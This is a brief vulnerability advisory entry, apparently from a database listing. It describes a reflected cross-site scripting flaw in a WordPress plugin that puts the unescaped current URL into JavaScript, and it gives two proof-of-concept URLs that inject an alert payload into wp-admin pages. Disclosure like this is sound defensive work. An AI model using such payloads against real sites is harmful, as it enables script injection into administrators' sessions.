EPSS
Percentile
40.2%
The plugin does not escape the current URL before putting it back in a JavaScript context, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/?test"-alert(/XSS/)-" https://example.com/wp-admin/profile.php?test"-alert(/XSS/)-"